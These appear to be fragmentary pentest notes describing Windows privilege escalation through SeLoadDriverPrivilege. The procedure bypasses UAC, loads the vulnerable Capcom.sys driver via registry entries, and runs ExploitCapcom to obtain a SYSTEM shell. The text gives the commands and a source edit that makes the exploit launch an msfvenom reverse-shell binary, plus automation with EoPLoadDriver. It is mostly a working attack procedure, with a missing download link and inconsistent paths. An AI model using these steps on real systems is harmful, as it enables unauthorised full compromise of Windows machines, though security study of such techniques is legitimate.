SeLoadDriverPrivilege

Enable the permission first: Use UACMe to bypass UAC

It's well known that the driver Capcom.sys contains functionality to allow any user to execute shellcode with SYSTEM privileges

Use this to load driver

Add these includes:

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"

Next compile it with using cl.exe like so:

cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp

Add a reference to driver

Then download Capcom.sys driver from here and save it to C:\temp Then:

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

The odd syntax \??\ used to reference our malicious driver's ImagePath is an NT Object Path. The Win32 API will parse and resolve this path to properly locate and load our malicious driver.

Verify Driver not loaded

Use DriverView.exe .\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

Then run the EnableSeLoadDriverPrivilege.exe that was previously compiled EnableSeLoadDriverPrivilege.exe

Verify Capcom Driver is Listed

.\DriverView.exe /stext drivers.txt

cat drivers.txt | Select-String -pattern Capcom

Use ExploitCapcom Tool to Escalate Privileges

Use ExploitCapcom after compiling

Now we get a system shell

No gui

If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling. Here we can edit line 292 and replace "C:\\Windows\\system32\\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example: c:\ProgramData\revshell.exe.

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

The Command Line string in this example would be changed to:

 TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Automating with EopLoadDriver

EopLoadDriver

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

We would then run ExploitCapcom.exe to pop a SYSTEM shell or run our custom binary.